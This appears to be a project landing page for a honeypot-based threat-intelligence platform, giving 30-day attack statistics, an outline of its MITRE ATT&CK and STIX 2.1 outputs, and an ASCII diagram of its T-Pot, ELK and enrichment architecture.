T-Pot 23.x · STIX 2.1 · MITRE ATT&CK · ELK Stack

Deception-Based Threat Intelligence
Platform

30-day live honeypot deployment capturing real-world attacker TTPs, producing structured STIX 2.1 threat intelligence feeds and MITRE ATT&CK-mapped findings.

View Repository Explore Findings ↓
500k+Attack Events
12.5k+Unique IPs
8k+IOCs Extracted
9TTPs Mapped
30Days Live
30-Day Findings
Live Attack Telemetry
100% real-world data — no simulations, no synthetic logs. Every event captured from unsolicited inbound connections to the live honeypot.
🎯
500k+
Total Attack Events
Across all sensors
🌐
12,500+
Unique Attacker IPs
From 40+ countries
🔑
45,000+
Credential Attempts
Unique user/pass combos
🦠
150+
Malware Samples
Unique captured payloads
📡
8,000+
IOCs Extracted
IPs · Hashes · Domains
🕐
02–06
Peak Attack Window
UTC — automated bots
Top Targeted Ports
By total attack event volume
Attack Activity by Hour (UTC)
Avg events per hour over 30 days
Top Attacker Countries
Total attack events by origin country
MITRE ATT&CK
TTP Mapping
All observed techniques ranked by frequency. Mapped to MITRE ATT&CK and exported as STIX 2.1 attack-pattern objects.
Technique IDNameTacticSeverityEvent CountFrequency
Geographic Intelligence
Attack Origins
Top source countries ranked by total attack events. Enriched with Shodan, AbuseIPDB, and MaxMind GeoLite2 data.
Country Breakdown
Events by origin country
Attack Protocol Mix
By honeypot sensor type
Threat Intelligence Feed
STIX 2.1 Output
Structured threat intelligence bundles generated daily. MISP-compatible export and TAXII 2.0 server for consumer integration.
indicator
attack-pattern
malware
System Design
Platform Architecture
Fully passive deception infrastructure — captures only inbound unsolicited connections. No outbound attacks ever launched.
┌── PUBLIC INTERNET (Threat Actors) ─────────────────────────────┐ │ Scanners · Botnets · Exploit Kits · Brute-Forcers │ └──────────────────────┬─────────────────────────────────────────┘ │ Unsolicited inbound traffic only ┌────────▼────────┐ │ T-Pot VM │ Ubuntu 22.04 · Docker Orchestration │ Cowrie │ SSH / Telnet traps │ Dionaea │ SMB / FTP / HTTP · Malware collection │ Glastopf │ HTTP Web App exploits │ Heralding │ Multi-protocol credential logger └────────┬────────┘ │ JSON logs → Logstash → Elasticsearch ┌────────▼────────┐ │ ELK Stack │ Kibana Dashboards · 30-day retention └────────┬────────┘ │ Enrichment pipeline (Python) ┌───────────▼───────────┐ │ Threat Enrichment │ Shodan · AbuseIPDB · VirusTotal │ GeoIP · ASN · WHOIS │ MaxMind GeoLite2 · K-Means Clustering └───────────┬───────────┘ │ Structured output ┌──────────▼──────────┐ │ STIX 2.1 TIP Feed │ MISP Export · TAXII 2.0 Server │ MITRE ATT&CK Maps │ Research PDF · IOC Reports └─────────────────────┘
Research Insights
Key Observations